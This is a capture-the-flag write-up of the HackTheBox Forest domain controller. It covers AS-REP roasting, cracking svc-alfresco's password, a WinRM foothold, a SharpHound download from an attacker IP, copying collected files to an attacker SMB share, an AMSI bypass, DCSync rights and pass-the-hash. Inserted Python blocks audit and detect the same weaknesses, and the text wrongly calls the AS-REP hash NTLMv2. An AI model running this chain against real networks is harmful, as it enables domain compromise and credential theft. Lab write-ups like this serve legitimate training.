Forest

Enumeration

nmap

Initial enumeration with nmap

Some useful information:

Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-06-13T01:57:38-07:00

OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3

3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)

Let's enumerate users. For user enumeration, we can search LDAP for objects whose objectClass is person and read their sAMAccountName:

Users

=======================================( Users on 10.129.95.210 )=======================================
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

ASREPRoast

EXPLANATION - For user accounts that are enabled and have Kerberos pre-authentication disabled, the account is vulnerable to AS-REP Roasting. We can request a TGT for that user without providing any authentication, and the reply we get back contains data encrypted with a key derived from the account's password, so the hash can be cracked offline. Using Impacket's GetNPUsers.py script, we can do the attack:

Save the list of users in a file and run GetNPUsers.py against it:

GetNPUsers.py htb.local/ -no-pass -usersfile users    
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:28a1170a7195863540958b52e6bbb280$d4652fa91e48bbd92d0ab6e48587a387facdd084a00e7b6af81269add267b96ba8d96e1cabf89c5cef9dfa036407d43fb111358a68a8a2a2cc289177d6f6778e40aba64ec828fd108050edbbe7aacfa098897f8012539de5aec2921234790474b73773b291561b3b775117ea23e8ac3a969db66fb99e8156fd89e00c4769b548e597030639d1cc4433b3978782f75e1661a977680dfbc6cefc08354b01c253669d9af8ad6abe3e5c55742d99a9d5c1787b1c1019f23b20dca3a6ff806be411d06b2c0efae4e2357452ed943520019020e7d951bd6bd2de6d02cd66079120233d1e718e8a561d
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
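The status lines above ("doesn't have UF_DONT_REQUIRE_PREAUTH set") refer to a bit in each account's userAccountControl attribute, and the one hash line follows the fixed $krb5asrep$ layout. The script below is an added example written for this writeup, not part of the original post or of Impacket: it audits a list of accounts for the DONT_REQUIRE_PREAUTH bit (the fix for the box is clearing that bit on svc-alfresco) and splits a $krb5asrep$ line into its fields so you can see which principal and encryption type were returned. The account list and the sample hash are constructed; the flag values and GUID-free etype numbers are the real AD and Kerberos constants.

```python
"""Added example (not from the original writeup): decode the userAccountControl
bit GetNPUsers.py reports and parse the $krb5asrep$ line format.
All sample data below is constructed."""
import re

# Real userAccountControl flag values (ADS_USER_FLAG_ENUM).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Kerberos encryption types that appear in the $krb5asrep$ header.
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96",
               18: "aes256-cts-hmac-sha1-96",
               23: "rc4-hmac"}

# Constructed LDAP results: (sAMAccountName, userAccountControl).  These are
# illustrative values, not the real attributes of the Forest box.
SAMPLE_ACCOUNTS = [
    ("sebastien", 0x10200),        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("svc-alfresco", 0x410200),    # ... | DONT_REQUIRE_PREAUTH -> roastable
    ("old-svc", 0x400202),         # DONT_REQUIRE_PREAUTH but ACCOUNTDISABLE
]


def roastable_accounts(accounts):
    """Return enabled accounts whose userAccountControl has DONT_REQUIRE_PREAUTH set.
    Disabled accounts are skipped: the KDC rejects them regardless of the flag."""
    hits = []
    for name, uac in accounts:
        if uac & UF_ACCOUNTDISABLE:
            continue
        if uac & UF_DONT_REQUIRE_PREAUTH:
            hits.append(name)
    return hits


# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<enc-part hex>
HASH_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line):
    """Split one GetNPUsers.py hash line into its components.
    Returns None for lines that are not hashes (e.g. the '[-] User ...' lines)."""
    m = HASH_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": m.group("checksum").lower(),
        "enc_len": len(m.group("enc")) // 2,   # ciphertext length in bytes
    }


# Constructed hash in the same layout as the real one above (short ciphertext).
SAMPLE_HASH = ("$krb5asrep$23$svc-alfresco@HTB.LOCAL:" + "00" * 16
               + "$" + "ab" * 40)

if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
    print(parse_asrep_hash(SAMPLE_HASH))
```

The etype in the header (23 here) is what tells john and hashcat which key derivation to use; an RC4 (etype 23) reply is the cheapest to crack, so raising the account's msDS-SupportedEncryptionTypes to AES only is a second mitigation after re-enabling pre-authentication.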

Cracking the Password

The Kerberos pre-authentication for the user svc-alfresco is turned off, and the KDC provided a TGT encrypted using the user’s password.

Store the encrypted TGT in a file named hash.txt. We'll then crack it offline. With hashcat, given that the hash is of type NTLMv2, we'd utilize the -m 18200 flag; the run below uses john instead:

john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)     
1g 0:00:00:28 DONE (2022-06-13 05:21) 0.03519g/s 143814p/s 143814c/s 143814C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
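From the domain controller's side, the request GetNPUsers.py sent shows up as Security event 4768 with Pre-Authentication Type 0 and a successful result, which is the usual detection for this step. The rule below is an added example, not part of the original writeup: it runs a simple AS-REP roasting check over constructed key=value renderings of 4768 events (the field names follow the Windows event schema; the lines themselves are made up, not logs from the Forest box).

```python
"""Added example (not from the original writeup): flag AS-REP roasting in
Windows Security event 4768 records.  The event lines are constructed."""

# Constructed renderings of event 4768 ("A Kerberos authentication ticket
# (TGT) was requested") plus one 4769 line to show the filter on EventID.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=sebastien TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=svc-alfresco TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=lucinda TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x17 PreAuthType=2 Status=0x18
EventID=4769 TargetUserName=andy TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=mark TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x12 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=santi TargetDomainName=HTB.LOCAL IpAddress=10.10.14.8 TicketEncryptionType=0x12 PreAuthType=0 Status=0x19
"""

RC4_HMAC = 0x17          # TicketEncryptionType value for etype 23
PREAUTH_NONE = 0         # PreAuthType 0: no pre-authentication data sent
KDC_ERR_PREAUTH_REQUIRED = 0x19


def parse_event(line):
    """Turn one 'key=value key=value' line into a dict with typed fields."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    return {
        "event_id": int(fields["EventID"]),
        "user": fields["TargetUserName"],
        "domain": fields["TargetDomainName"],
        "ip": fields["IpAddress"],
        "etype": int(fields["TicketEncryptionType"], 16),
        "preauth": int(fields["PreAuthType"]),
        "status": int(fields["Status"], 16),
    }


def is_asrep_roast(ev):
    """A TGT was issued (status 0x0) although the client sent no pre-auth data.
    A normal client that first asks without pre-auth gets KDC_ERR_PREAUTH_REQUIRED
    (0x19), never a ticket, so the success status is what separates the two."""
    return (ev["event_id"] == 4768
            and ev["preauth"] == PREAUTH_NONE
            and ev["status"] == 0x0)


def detect_asrep_roast(text):
    """Return one finding per matching event; rc4=True marks the weakest case."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_asrep_roast(ev):
            findings.append({"user": ev["user"], "ip": ev["ip"],
                             "rc4": ev["etype"] == RC4_HMAC})
    return findings


if __name__ == "__main__":
    for f in detect_asrep_roast(SAMPLE_EVENTS):
        print(f)
```

The 0x19 line is the important negative: every client's first AS-REQ is sent without pre-authentication, so alerting on PreAuthType 0 alone is noisy; the issued ticket (Status 0x0) is the signal. Note that the page's GetNPUsers.py run also produced a KDC_ERR_C_PRINCIPAL_UNKNOWN error and four "doesn't have UF_DONT_REQUIRE_PREAUTH set" results, which a DC logs as failed 4768 events from the same source IP in a short burst, a useful secondary indicator.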

Testing the credentials:

Connection

The password of the user svc-alfresco is s3rvice. Now that we have svc-alfresco's password, we can log in using crackmapexec or evil-winrm to gain an initial foothold.

evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice

Getting user flag:

Local enumeration

Copy sharphound.exe to the machine:

Powershell.exe -ExecutionPolicy Bypass Invoke-WebRequest "http://10.10.16.13/sharphound.exe" -OutFile "sharp.exe"

Execute:

./sharp.exe -c all --zipfilename forest.zip

Start an SMB server for the file transfer:

smbserver.py -comment SHARE -username test -password test -ip 10.10.14.8 -port 445 -smb2support SHARE ./

Map the drive and copy the file:

net use y: \\10.10.14.8\SHARE /user:test test
copy 20220613040930_file.zip y:

Drag the zip into BloodHound.

Use the query “Shortest Paths to Domain Admins from Owned Principals”

Use the query “Shortest Paths to High Value Targets”

One of the paths shows that the Exchange Windows Permissions group has WriteDACL on the domain object. WriteDACL allows a principal to modify the object's DACL, i.e. to add ACEs to it. This means that if we add a user to this group, we can grant that user DCSync rights on the domain.

DCSync - Exploit

Create a new user and add it to the group:

Copy PowerView to the host and run Bypass-AMSI.

Bypass-AMSI is used to bypass Defender before importing the script. Next, we can use Add-ObjectACL with John's credentials to grant him DCSync rights.
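What Add-ObjectACL writes here is two allow ACEs on the domain object carrying the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, and the root cause is the WriteDACL ACE that BloodHound surfaced. The audit below is an added example written for this writeup (not the writeup's own code, PowerView or BloodHound): given ACEs read from the domain object's DACL, it reports principals outside an expected baseline that can DCSync, and principals that hold WriteDACL or GenericAll and could therefore grant themselves those rights. The access-mask bits and extended-right GUIDs are the real AD values; the ACE list, the HTB\ trustee names and the baseline set are constructed for the example.

```python
"""Added example (not from the original writeup): audit a domain object's DACL
for DCSync rights and for WriteDACL holders.  ACEs and baseline are constructed."""

# Access-mask bits from ADS_RIGHTS_ENUM (real values).
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # extended right; ObjectType says which
ADS_RIGHT_WRITE_DAC = 0x00040000           # WriteDACL
ADS_RIGHT_GENERIC_ALL = 0x10000000

# Extended-right GUIDs from the AD schema (real values).  DCSync needs both.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals expected to replicate or edit the DACL (assumed baseline for the sample).
BASELINE = {
    "BUILTIN\\Administrators",
    "HTB\\Domain Controllers",
    "HTB\\Domain Admins",
    "HTB\\Enterprise Admins",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
}

# Constructed allow ACEs on DC=htb,DC=local: (trustee, access mask, ObjectType or None).
SAMPLE_ACES = [
    ("BUILTIN\\Administrators", ADS_RIGHT_GENERIC_ALL, None),
    ("HTB\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("HTB\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    ("HTB\\Exchange Windows Permissions", ADS_RIGHT_WRITE_DAC, None),
    ("HTB\\john", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
    ("HTB\\john", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL),
    ("HTB\\Read-only Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
]


def replication_rights(aces):
    """Map trustee -> set of replication rights it effectively holds.
    GenericAll, or CONTROL_ACCESS with no ObjectType (every extended right), grants both."""
    held = {}
    for trustee, mask, guid in aces:
        rights = set()
        if mask & ADS_RIGHT_GENERIC_ALL:
            rights = set(REPLICATION_RIGHTS)
        elif mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            if guid is None:
                rights = set(REPLICATION_RIGHTS)
            elif guid.lower() in REPLICATION_RIGHTS:
                rights = {guid.lower()}
        if rights:
            held.setdefault(trustee, set()).update(rights)
    return held


def audit_domain_dacl(aces, baseline=BASELINE):
    """Return non-baseline principals that can DCSync (hold both rights) and
    non-baseline principals holding WriteDACL/GenericAll on the object."""
    dcsync = sorted(t for t, r in replication_rights(aces).items()
                    if r == REPLICATION_RIGHTS and t not in baseline)
    writedacl = sorted({t for t, mask, _ in aces
                        if mask & (ADS_RIGHT_WRITE_DAC | ADS_RIGHT_GENERIC_ALL)
                        and t not in baseline})
    return {"dcsync": dcsync, "writedacl": writedacl}


if __name__ == "__main__":
    print(audit_domain_dacl(SAMPLE_ACES))
```

The read-only DC entry shows why the check requires both GUIDs: RODCs legitimately hold Get-Changes alone and cannot pull secrets with it. In a real run the ACEs would come from the nTSecurityDescriptor of the domain naming context, and the Exchange Windows Permissions finding is the one to remediate, since any member of that group can recreate the john ACEs.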

Assigning DCSync rights to the user:

Dump the credentials:

I attempted cracking without success, so I resorted to using pass-the-hash with psexec.

Getting root flag: